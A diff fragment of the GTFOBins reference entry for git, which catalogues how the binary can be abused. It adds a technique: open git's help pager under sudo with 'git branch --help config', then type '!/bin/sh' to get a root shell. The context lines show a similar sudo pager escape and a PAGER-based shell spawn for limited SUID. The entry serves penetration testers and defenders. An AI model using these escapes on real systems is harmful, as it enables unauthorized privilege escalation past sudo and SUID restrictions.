GTFOBins/GTFOBins.github.io/_gtfobins/git.md

       code: |
         sudo git -p help config
         !/bin/sh
+    - description: The help system can also be reached from any `git` command, e.g., `git branch`.
+This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
+      code: |
+        sudo git branch --help config
+        !/bin/sh
   limited-suid:
     - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
 ---